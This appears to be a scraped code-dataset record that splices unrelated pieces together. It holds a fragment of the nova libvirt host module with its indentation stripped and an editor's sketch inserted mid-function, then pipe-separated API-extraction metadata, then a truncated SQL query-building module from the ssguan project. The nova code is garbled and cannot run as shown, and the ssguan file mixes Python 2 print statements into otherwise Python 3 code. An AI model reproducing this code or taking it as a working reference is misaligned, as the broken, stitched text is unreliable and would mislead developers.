idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
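    # NOTE(editor): illustrative sketch, not part of nova and never called
    # by the driver. The helper above counts MemFree + Buffers + Cached
    # (all in KiB) as "available"; the same arithmetic on a hypothetical
    # /proc/meminfo excerpt:
    @staticmethod
    def _example_avail_memory_sketch():
        sample = ('MemTotal: 16000000 kB MemFree: 1000000 kB '
                  'Buffers: 200000 kB Cached: 3000000 kB')
        m = sample.split()
        avail_kb = (int(m[m.index('MemFree:') + 1]) +
                    int(m[m.index('Buffers:') + 1]) +
                    int(m[m.index('Cached:') + 1]))
        return avail_kb  # 4200000 KiB; callers divide by units.Ki for MiB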
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
            # For xen, report the sum of all domains, with the host
            # (dom0) usage included
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def list_all_devices(
self, flags: int = 0) -> ty.List['libvirt.virNodeDevice']:
"""Lookup devices.
:param flags: a bitmask of flags to filter the returned devices.
:returns: a list of virNodeDevice xml strings.
"""
try:
return self.get_connection().listAllDevices(flags) or []
except libvirt.libvirtError as ex:
LOG.warning(ex)
return []
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
| [
"libvirt.virEventRegisterDefaultImpl",
"nova.virt.libvirt.config.LibvirtConfigCaps",
"nova.virt.libvirt.utils.get_default_machine_type",
"oslo_utils.importutils.import_module",
"nova.utils.spawn",
"nova.compute.utils.notify_about_libvirt_connect_error",
"nova.i18n._",
"nova.virt.libvirt.config.Libvirt... | [((2186, 2213), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2203, 2213), True, 'from oslo_log import log as logging\n'), ((2231, 2257), 'eventlet.patcher.original', 'patcher.original', (['"""socket"""'], {}), "('socket')\n", (2247, 2257), False, 'from eventlet import patcher\n'), ((2277, 2306), 'eventlet.patcher.original', 'patcher.original', (['"""threading"""'], {}), "('threading')\n", (2293, 2306), False, 'from eventlet import patcher\n'), ((2322, 2371), 'eventlet.patcher.original', 'patcher.original', (["('Queue' if six.PY2 else 'queue')"], {}), "('Queue' if six.PY2 else 'queue')\n", (2338, 2371), False, 'from eventlet import patcher\n'), ((3149, 3162), 'queue.Queue', 'queue.Queue', ([], {}), '()\n', (3160, 3162), False, 'import queue\n'), ((3386, 3402), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (3400, 3402), False, 'import threading\n'), ((4571, 4622), 'inspect.getmembers', 'inspect.getmembers', (['libvirt_module', 'inspect.isclass'], {}), '(libvirt_module, inspect.isclass)\n', (4589, 4622), False, 'import inspect\n'), ((5358, 5412), 'eventlet.tpool.Proxy', 'tpool.Proxy', (['obj'], {'autowrap': 'self._libvirt_proxy_classes'}), '(obj, autowrap=self._libvirt_proxy_classes)\n', (5369, 5412), False, 'from eventlet import tpool\n'), ((16503, 16537), 'nova.utils.spawn', 'utils.spawn', (['self._dispatch_thread'], {}), '(self._dispatch_thread)\n', (16514, 16537), False, 'from nova import utils\n'), ((20830, 20893), 'libvirt.registerErrorHandler', 'libvirt.registerErrorHandler', (['self._libvirt_error_handler', 'None'], {}), '(self._libvirt_error_handler, None)\n', (20858, 20893), False, 'import libvirt\n'), ((20902, 20939), 'libvirt.virEventRegisterDefaultImpl', 'libvirt.virEventRegisterDefaultImpl', ([], {}), '()\n', (20937, 20939), False, 'import libvirt\n'), ((21040, 21076), 'nova.utils.spawn', 'utils.spawn', (['self._conn_event_thread'], {}), '(self._conn_event_thread)\n', (21051, 21076), False, 'from nova import utils\n'), ((33225, 33242), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (33236, 33242), False, 'from collections import defaultdict\n'), ((39738, 39771), 'nova.virt.libvirt.config.LibvirtConfigDomainCaps', 'vconfig.LibvirtConfigDomainCaps', ([], {}), '()\n', (39769, 39771), True, 'from nova.virt.libvirt import config as vconfig\n'), ((42091, 42120), 'nova.virt.libvirt.config.LibvirtConfigSecret', 'vconfig.LibvirtConfigSecret', ([], {}), '()\n', (42118, 42120), True, 'from nova.virt.libvirt import config as vconfig\n'), ((46863, 46890), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['domain'], {}), '(domain)\n', (46882, 46890), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((2878, 2914), 'oslo_utils.importutils.import_module', 'importutils.import_module', (['"""libvirt"""'], {}), "('libvirt')\n", (2903, 2914), False, 'from oslo_utils import importutils\n'), ((5982, 6014), 'libvirt.virEventRunDefaultImpl', 'libvirt.virEventRunDefaultImpl', ([], {}), '()\n', (6012, 6014), False, 'import libvirt\n'), ((14256, 14327), 'eventlet.greenthread.spawn_after', 'greenthread.spawn_after', (['self._lifecycle_delay', 'self._event_emit', 'event'], {}), '(self._lifecycle_delay, self._event_emit, event)\n', (14279, 14327), False, 'from eventlet import greenthread\n'), ((15068, 15077), 'os.pipe', 'os.pipe', ([], {}), '()\n', (15075, 15077), False, 'import os\n'), ((15116, 15149), 'eventlet.greenio.GreenPipe', 'greenio.GreenPipe', (['wpipe', '"""wb"""', 
'(0)'], {}), "(wpipe, 'wb', 0)\n", (15133, 15149), False, 'from eventlet import greenio\n'), ((15188, 15221), 'eventlet.greenio.GreenPipe', 'greenio.GreenPipe', (['rpipe', '"""rb"""', '(0)'], {}), "(rpipe, 'rb', 0)\n", (15205, 15221), False, 'from eventlet import greenio\n'), ((24573, 24597), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['dom'], {}), '(dom)\n', (24592, 24597), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((27583, 27610), 'nova.virt.libvirt.config.LibvirtConfigCaps', 'vconfig.LibvirtConfigCaps', ([], {}), '()\n', (27608, 27610), True, 'from nova.virt.libvirt import config as vconfig\n'), ((46765, 46793), 'oslo_utils.encodeutils.safe_encode', 'encodeutils.safe_encode', (['xml'], {}), '(xml)\n', (46788, 46793), False, 'from oslo_utils import encodeutils\n'), ((50324, 50361), 'os.path.exists', 'os.path.exists', (['SEV_KERNEL_PARAM_FILE'], {}), '(SEV_KERNEL_PARAM_FILE)\n', (50338, 50361), False, 'import os\n'), ((9534, 9576), 'nova.virt.event.LifecycleEvent', 'virtevent.LifecycleEvent', (['uuid', 'transition'], {}), '(uuid, transition)\n', (9558, 9576), True, 'from nova.virt import event as virtevent\n'), ((10426, 10487), 'nova.i18n._', '_', (['"""Can not handle authentication request for %d credentials"""'], {}), "('Can not handle authentication request for %d credentials')\n", (10427, 10487), False, 'from nova.i18n import _\n'), ((15818, 15844), 'eventlet.greenio.GreenSocket', 'greenio.GreenSocket', (['csock'], {}), '(csock)\n', (15837, 15844), False, 'from eventlet import greenio\n'), ((19992, 20024), 'nova.context.get_admin_context', 'nova_context.get_admin_context', ([], {}), '()\n', (20022, 20024), True, 'from nova import context as nova_context\n'), ((20215, 20302), 'nova.compute.utils.notify_about_libvirt_connect_error', 'compute_utils.notify_about_libvirt_connect_error', (['ctxt'], {'ip': 'CONF.my_ip', 'exception': 'ex'}), '(ctxt, ip=CONF.my_ip,\n exception=ex)\n', (20263, 20302), True, 'from nova.compute import utils as compute_utils\n'), ((20334, 20367), 'nova.exception.HypervisorUnavailable', 'exception.HypervisorUnavailable', ([], {}), '()\n', (20365, 20367), False, 'from nova import exception\n'), ((24144, 24172), 'nova.exception.InternalError', 'exception.InternalError', (['msg'], {}), '(msg)\n', (24167, 24172), False, 'from nova import exception\n'), ((35256, 35300), 'nova.virt.libvirt.utils.get_default_machine_type', 'libvirt_utils.get_default_machine_type', (['arch'], {}), '(arch)\n', (35294, 35300), True, 'from nova.virt.libvirt import utils as libvirt_utils\n'), ((13188, 13223), 'nova.i18n._', '_', (['"""Connection to libvirt lost: %s"""'], {}), "('Connection to libvirt lost: %s')\n", (13189, 13223), False, 'from nova.i18n import _\n'), ((18402, 18433), 'nova.i18n._', '_', (['"""Connection to libvirt lost"""'], {}), "('Connection to libvirt lost')\n", (18403, 18433), False, 'from nova.i18n import _\n'), ((21578, 21621), 'oslo_utils.versionutils.convert_version_to_int', 'versionutils.convert_version_to_int', (['lv_ver'], {}), '(lv_ver)\n', (21613, 21621), False, 'from oslo_utils import versionutils\n'), ((21812, 21855), 'oslo_utils.versionutils.convert_version_to_int', 'versionutils.convert_version_to_int', (['hv_ver'], {}), '(hv_ver)\n', (21847, 21855), False, 'from oslo_utils import versionutils\n'), ((23802, 23855), 'nova.exception.InstanceNotFound', 'exception.InstanceNotFound', ([], {'instance_id': 'instance.uuid'}), '(instance_id=instance.uuid)\n', (23828, 23855), False, 'from nova import exception\n'), ((23876, 23975), 
'nova.i18n._', '_', (['"""Error from libvirt while looking up %(instance_name)s: [Error Code %(error_code)s] %(ex)s"""'], {}), "('Error from libvirt while looking up %(instance_name)s: [Error Code %(error_code)s] %(ex)s'\n )\n", (23877, 23975), False, 'from nova.i18n import _\n'), ((41195, 41222), 'nova.i18n._', '_', (['"""Invalid usage_type: %s"""'], {}), "('Invalid usage_type: %s')\n", (41196, 41222), False, 'from nova.i18n import _\n'), ((41241, 41282), 'nova.exception.InternalError', 'exception.InternalError', (['(msg % usage_type)'], {}), '(msg % usage_type)\n', (41264, 41282), False, 'from nova import exception\n'), ((43087, 43124), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (43122, 43124), False, 'from oslo_utils import excutils\n'), ((20037, 20064), 'nova.rpc.get_notifier', 'rpc.get_notifier', (['"""compute"""'], {}), "('compute')\n", (20053, 20064), False, 'from nova import rpc\n'), ((28399, 28425), 'nova.virt.libvirt.config.LibvirtConfigCPU', 'vconfig.LibvirtConfigCPU', ([], {}), '()\n', (28423, 28425), True, 'from nova.virt.libvirt import config as vconfig\n'), ((42658, 42685), 'nova.i18n._', '_', (['"""Invalid usage_type: %s"""'], {}), "('Invalid usage_type: %s')\n", (42659, 42685), False, 'from nova.i18n import _\n'), ((42704, 42745), 'nova.exception.InternalError', 'exception.InternalError', (['(msg % usage_type)'], {}), '(msg % usage_type)\n', (42727, 42745), False, 'from nova import exception\n'), ((8532, 8556), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['dom'], {}), '(dom)\n', (8551, 8556), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((18703, 18740), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (18738, 18740), False, 'from oslo_utils import excutils\n'), ((8808, 8877), 'nova.virt.libvirt.migration.find_job_type', 'libvirt_migrate.find_job_type', (['guest'], {'instance': 'None', 'logging_ok': '(False)'}), '(guest, instance=None, logging_ok=False)\n', (8837, 8877), True, 'from nova.virt.libvirt import migration as libvirt_migrate\n'), ((19216, 19258), 'nova.i18n._', '_', (['"""Failed to connect to libvirt: %(msg)s"""'], {}), "('Failed to connect to libvirt: %(msg)s')\n", (19217, 19258), False, 'from nova.i18n import _\n')] |
# -*- coding: utf-8 -*-
# Copyright 2015 www.suishouguan.com
#
# Licensed under the Private License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/samuelbaizg/ssguan/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import time
from ssguan.ignitor.base.struct import ThreadedDict, Storage
from ssguan.ignitor.base.struct import iters, IterBetter
__all__ = [
"UnknownParamstyle", "UnknownDB", "TransactionError",
"sqllist", "sqlors", "reparam", "sqlquote",
"SQLQuery", "SQLParam", "sqlparam",
"SQLLiteral", "sqlliteral",
"database", 'DB',
]
try:
import datetime
except ImportError:
datetime = None
debug = sys.stderr
config = Storage()
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
class _ItplError(ValueError):
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
class TransactionError(Exception): pass
class UnknownParamstyle(Exception):
"""
raised for unsupported db paramstyles
(currently supported: qmark, numeric, format, pyformat)
"""
pass
class SQLParam(object):
"""
Parameter in SQLQuery.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
>>> q
<sql: "SELECT * FROM test WHERE name='joe'">
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.values()
['joe']
"""
__slots__ = ["value"]
def __init__(self, value):
self.value = value
def get_marker(self, paramstyle='pyformat'):
if paramstyle == 'qmark':
return '?'
elif paramstyle == 'numeric':
return ':1'
elif paramstyle is None or paramstyle in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(paramstyle)
def sqlquery(self):
return SQLQuery([self])
def __add__(self, other):
return self.sqlquery() + other
def __radd__(self, other):
return other + self.sqlquery()
def __str__(self):
return str(self.value)
def __repr__(self):
return '<param: %s>' % repr(self.value)
sqlparam = SQLParam
class SQLQuery(object):
"""
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `args`
and the function will call reparam for you.
Internally, consists of `items`, which is a list of strings and
SQLParams, which get concatenated to produce the actual query.
"""
__slots__ = ["items"]
# tested in sqlquote's docstring
def __init__(self, items=None):
r"""Creates a new SQLQuery.
>>> SQLQuery("x")
<sql: 'x'>
>>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
>>> q
<sql: 'SELECT * FROM test WHERE x=1'>
>>> q.query(), q.values()
('SELECT * FROM test WHERE x=%s', [1])
>>> SQLQuery(SQLParam(1))
<sql: '1'>
"""
if items is None:
self.items = []
elif isinstance(items, list):
self.items = items
elif isinstance(items, SQLParam):
self.items = [items]
elif isinstance(items, SQLQuery):
self.items = list(items.items)
else:
self.items = [items]
# Take care of SQLLiterals
for i, item in enumerate(self.items):
if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
self.items[i] = item.value.v
def append(self, value):
self.items.append(value)
def __add__(self, other):
if isinstance(other, str):
items = [other]
elif isinstance(other, SQLQuery):
items = other.items
else:
return NotImplemented
return SQLQuery(self.items + items)
def __radd__(self, other):
if isinstance(other, str):
items = [other]
else:
return NotImplemented
return SQLQuery(items + self.items)
def __iadd__(self, other):
if isinstance(other, (str, SQLParam)):
self.items.append(other)
elif isinstance(other, SQLQuery):
self.items.extend(other.items)
else:
return NotImplemented
return self
def __len__(self):
return len(self.query())
def query(self, paramstyle=None):
"""
Returns the query part of the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.query(paramstyle='qmark')
'SELECT * FROM test WHERE name=?'
"""
s = []
for x in self.items:
if isinstance(x, SQLParam):
x = x.get_marker(paramstyle)
s.append(x)
else:
# automatically escape % characters in the query
                # For backward compatibility, ignore escaping when the query looks already escaped
if paramstyle in ['format', 'pyformat']:
if '%' in x and '%%' not in x:
x = x.replace('%', '%%')
s.append(x)
return "".join(s)
def values(self):
"""
Returns the values of the parameters used in the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.values()
['joe']
"""
return [i.value for i in self.items if isinstance(i, SQLParam)]
def join(items, sep=' ', prefix=None, suffix=None, target=None):
"""
Joins multiple queries.
>>> SQLQuery.join(['a', 'b'], ', ')
<sql: 'a, b'>
        Optionally, prefix and suffix arguments can be provided.
>>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
<sql: '(a, b)'>
If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
"""
if target is None:
target = SQLQuery()
target_items = target.items
if prefix:
target_items.append(prefix)
for i, item in enumerate(items):
if i != 0:
target_items.append(sep)
if isinstance(item, SQLQuery):
target_items.extend(item.items)
else:
target_items.append(item)
if suffix:
target_items.append(suffix)
return target
join = staticmethod(join)
def _str(self):
try:
return self.query() % tuple([sqlify(x) for x in self.values()])
except (ValueError, TypeError):
return self.query()
def __str__(self):
return self._str()
def __repr__(self):
return '<sql: %s>' % repr(str(self))
class SQLLiteral:
"""
Protects a string from `sqlquote`.
>>> sqlquote('NOW()')
<sql: "'NOW()'">
>>> sqlquote(SQLLiteral('NOW()'))
<sql: 'NOW()'>
"""
def __init__(self, v):
self.v = v
def __repr__(self):
return self.v
sqlliteral = SQLLiteral
def _sqllist(values):
"""
>>> _sqllist([1, 2, 3])
<sql: '(1, 2, 3)'>
"""
items = []
items.append('(')
for i, v in enumerate(values):
if i != 0:
items.append(', ')
items.append(sqlparam(v))
items.append(')')
return SQLQuery(items)
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns an `SQLQuery` for the result.
>>> reparam("s = $s", dict(s=True))
<sql: "s = 't'">
>>> reparam("s IN $s", dict(s=[1, 2]))
<sql: 's IN (1, 2)'>
"""
dictionary = dictionary.copy() # eval mucks with it
result = []
for live, chunk in _interpolate(string_):
if live:
v = eval(chunk, dictionary)
result.append(sqlquote(v))
else:
result.append(chunk)
return SQLQuery.join(result, '')
def sqlify(obj):
"""
converts `obj` to its proper SQL version
>>> sqlify(None)
'NULL'
>>> sqlify(True)
"'t'"
>>> sqlify(3)
'3'
"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif datetime and isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
return repr(obj)
def sqllist(lst):
"""
Converts the arguments for use in something like a WHERE clause.
>>> sqllist(['a', 'b'])
'a, b'
>>> sqllist('a')
'a'
>>> sqllist(u'abc')
u'abc'
"""
if isinstance(lst, str):
return lst
else:
return ', '.join(lst)
def sqlors(left, lst):
"""
    `left` is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
>>> sqlors('foo = ', [])
<sql: '1=2'>
>>> sqlors('foo = ', [1])
<sql: 'foo = 1'>
>>> sqlors('foo = ', 1)
<sql: 'foo = 1'>
>>> sqlors('foo = ', [1,2,3])
<sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return SQLQuery("1=2")
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return SQLQuery(['('] +
sum([[left, sqlparam(x), ' OR '] for x in lst], []) +
['1=2)']
)
else:
return left + sqlparam(lst)
def sqlwhere(dictionary, grouping=' AND '):
"""
Converts a `dictionary` to an SQL WHERE clause `SQLQuery`.
>>> sqlwhere({'cust_id': 2, 'order_id':3})
<sql: 'order_id = 3 AND cust_id = 2'>
>>> sqlwhere({'cust_id': 2, 'order_id':3}, grouping=', ')
<sql: 'order_id = 3, cust_id = 2'>
>>> sqlwhere({'a': 'a', 'b': 'b'}).query()
'a = %s AND b = %s'
"""
return SQLQuery.join([k + ' = ' + sqlparam(v) for k, v in dictionary.items()], grouping)
def sqlquote(a):
"""
Ensures `a` is quoted properly for use in a SQL query.
>>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
<sql: "WHERE x = 't' AND y = 3">
>>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
<sql: "WHERE x = 't' AND y IN (2, 3)">
"""
if isinstance(a, list):
return _sqllist(a)
else:
return sqlparam(a).sqlquery()
class Transaction:
"""Database transaction."""
def __init__(self, ctx):
self.ctx = ctx
self.transaction_count = transaction_count = len(ctx.transactions)
class transaction_engine:
"""Transaction Engine used in top level transactions."""
def do_transact(self):
ctx.commit(unload=False)
def do_commit(self):
ctx.commit()
def do_rollback(self):
ctx.rollback()
class subtransaction_engine:
"""Transaction Engine used in sub transactions."""
def query(self, q):
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
def do_transact(self):
self.query('SAVEPOINT webpy_sp_%s')
def do_commit(self):
self.query('RELEASE SAVEPOINT webpy_sp_%s')
def do_rollback(self):
self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
class dummy_engine:
"""Transaction Engine used instead of subtransaction_engine
when sub transactions are not supported."""
do_transact = do_commit = do_rollback = lambda self: None
if self.transaction_count:
# nested transactions are not supported in some databases
if self.ctx.get('ignore_nested_transactions'):
self.engine = dummy_engine()
else:
self.engine = subtransaction_engine()
else:
self.engine = transaction_engine()
self.engine.do_transact()
self.ctx.transactions.append(self)
def __enter__(self):
return self
def __exit__(self, exctype, excvalue, traceback):
if exctype is not None:
self.rollback()
else:
self.commit()
def commit(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_commit()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
def rollback(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_rollback()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
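# Illustrative usage (not part of the original source): a top-level transaction
# commits/rolls back on the connection, while a nested one falls back to
# SAVEPOINTs via subtransaction_engine. Assuming `db = sqlclient(dbn='sqlite', db=':memory:')`:
#
#     with db.transaction():               # outer: transaction_engine
#         db.insert('foo', name='a')
#         with db.transaction() as inner:  # nested: SAVEPOINT webpy_sp_1
#             db.insert('foo', name='b')
#             inner.rollback()             # ROLLBACK TO SAVEPOINT webpy_sp_1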
class DB:
"""Database"""
def __init__(self, db_module, keywords):
"""Creates a database.
"""
        # some DB implementations take an optional parameter `driver` to use a specific driver module
# but it should not be passed to connect
keywords.pop('driver', None)
self.db_module = db_module
self.keywords = keywords
self._ctx = ThreadedDict()
# flag to enable/disable printing queries
self.printing = config.get('debug_sql', config.get('debug', False))
self.supports_multiple_insert = False
# enable pooling if DBUtils module is available.
self.has_pooling = True
# Pooling can be disabled by passing pooling=False in the keywords.
self.has_pooling = self.keywords.pop('pooling', True) and self.has_pooling
def _getctx(self):
if not self._ctx.get('db'):
self._load_context(self._ctx)
return self._ctx
ctx = property(_getctx)
def _load_context(self, ctx):
ctx.dbq_count = 0
ctx.transactions = [] # stack of transactions
if self.has_pooling:
ctx.db = self._connect_with_pooling(self.keywords)
else:
ctx.db = self._connect(self.keywords)
ctx.db_execute = self._db_execute
if not hasattr(ctx.db, 'commit'):
ctx.db.commit = lambda: None
if not hasattr(ctx.db, 'rollback'):
ctx.db.rollback = lambda: None
def commit(unload=True):
# do db commit and release the connection if pooling is enabled.
ctx.db.commit()
if unload and self.has_pooling:
self._unload_context(self._ctx)
def rollback():
# do db rollback and release the connection if pooling is enabled.
ctx.db.rollback()
if self.has_pooling:
self._unload_context(self._ctx)
ctx.commit = commit
ctx.rollback = rollback
def _unload_context(self, ctx):
del ctx.db
def _connect(self, keywords):
return self.db_module.connect(**keywords)
def _connect_with_pooling(self, keywords):
def get_pooled_db():
from DBUtils import PooledDB
# In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
# see Bug#122112
if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
else:
return PooledDB.PooledDB(creator=self.db_module, **keywords)
if getattr(self, '_pooleddb', None) is None:
self._pooleddb = get_pooled_db()
return self._pooleddb.connection()
def _db_cursor(self):
return self.ctx.db.cursor()
def _param_marker(self):
"""Returns parameter marker based on paramstyle attribute if this database."""
style = getattr(self, 'paramstyle', 'pyformat')
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(style)
def _db_execute(self, cur, sql_query):
"""executes an sql query"""
self.ctx.dbq_count += 1
try:
a = time.time()
query, params = self._process_query(sql_query)
out = cur.execute(query, params)
b = time.time()
except:
if self.printing:
print >> debug, 'ERR:', str(sql_query)
if self.ctx.transactions:
self.ctx.transactions[-1].rollback()
else:
self.ctx.rollback()
raise
if self.printing:
print >> debug, '%s (%s): %s' % (round(b - a, 2), self.ctx.dbq_count, str(sql_query))
return out
def _process_query(self, sql_query):
"""Takes the SQLQuery object and returns query string and parameters.
"""
paramstyle = getattr(self, 'paramstyle', 'pyformat')
query = sql_query.query(paramstyle)
params = sql_query.values()
return query, params
def _where(self, where, args):
if isinstance(where, (int)):
where = "id = " + sqlparam(where)
#@@@ for backward-compatibility
elif isinstance(where, (list, tuple)) and len(where) == 2:
where = SQLQuery(where[0], where[1])
elif isinstance(where, SQLQuery):
pass
else:
where = reparam(where, args)
return where
def query(self, sql_query, args=None, processed=False, _test=False):
"""
Execute SQL query `sql_query` using dictionary `args` to interpolate it.
If `processed=True`, `args` is a `reparam`-style list to use
instead of interpolating.
>>> db = DB(None, {})
>>> db.query("SELECT * FROM foo", _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.query("SELECT * FROM foo WHERE x = $x", args=dict(x='f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
>>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
"""
if args is None: args = {}
if not processed and not isinstance(sql_query, SQLQuery):
sql_query = reparam(sql_query, args)
if _test: return sql_query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, sql_query)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield Storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = IterBetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [Storage(dict(zip(names, x))) \
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not self.ctx.transactions:
